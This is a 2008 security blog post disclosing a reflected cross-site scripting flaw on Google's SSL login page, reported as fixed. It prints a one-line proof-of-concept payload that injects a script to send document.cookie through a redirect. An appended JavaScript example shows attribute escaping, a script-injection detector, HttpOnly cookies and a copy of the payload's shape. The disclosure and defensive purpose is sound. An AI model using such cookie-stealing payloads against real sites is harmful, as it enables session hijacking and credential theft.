Google accounts SSL login page suffers from highly critical XSS

Nov 13, 2008 | Category: Google Vulns

In this case, the fact that SSL is used on the login page does not necessarily mean that users’ login information is secure. UPDATE: this was fixed a few hours after publishing it.

Malicious people can exploit this Google XSS to propagate malware, spyware, adware and steal authentication credentials.



Redirection and document.cookie PoC:'”><SCRIPT>location.href+%3D+’’%2Bdocument.cookie<%2FSCRIPT>&

Mirror of similar old Google XSS (now fixed):

Security researcher “Xylitol” is credited with the discovery of this critical bug.

It is only a matter of minutes before we see it fixed by Google.
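Why SSL on the login page does not help against this class of bug, as an added example (not code from Google or from the original post): a request value reflected into a quoted HTML attribute, first unescaped and then escaped, with a simplified tag scanner that reports whether markup lands outside the attribute. The field name `user`, the cookie name `session` and all function names are assumptions.

```javascript
// Added example. Field name "user", cookie name "session" and every
// function name here are hypothetical, not taken from the affected page.

// Encode the characters that can close an attribute value or open a tag.
function escapeHtmlAttr(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Vulnerable: the request value is copied into the attribute as-is.
function renderUnsafe(value) {
  return `<input type="text" name="user" value="${value}">`;
}

// Hardened: same template, value encoded for the attribute context.
function renderSafe(value) {
  return `<input type="text" name="user" value="${escapeHtmlAttr(value)}">`;
}

// Simplified scan of the <input> tag: track quoted attribute values, find
// the '>' that really ends the tag, and return whatever markup follows it.
function markupAfterInputTag(html) {
  let quote = null;
  for (let i = 0; i < html.length; i++) {
    const c = html[i];
    if (quote) { if (c === quote) quote = null; }
    else if (c === '"' || c === "'") quote = c;
    else if (c === '>') return html.slice(i + 1);
  }
  return '';
}

// True when a script element appears outside the reflected attribute.
function injectsScript(html) {
  return /<script\b/i.test(markupAfterInputTag(html));
}

// Secure only restricts the cookie to HTTPS transport; HttpOnly is the
// flag that keeps it out of document.cookie if script does run.
function sessionCookie(id) {
  return `session=${id}; Secure; HttpOnly; SameSite=Lax; Path=/`;
}

// Constructed input in the shape of the PoC above (destination left empty).
const SAMPLE = `'"><SCRIPT>location.href = ''+document.cookie</SCRIPT>`;
```

Transport encryption never enters the picture: both render functions would be served over HTTPS, and only the encoded one keeps the value inside the attribute.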

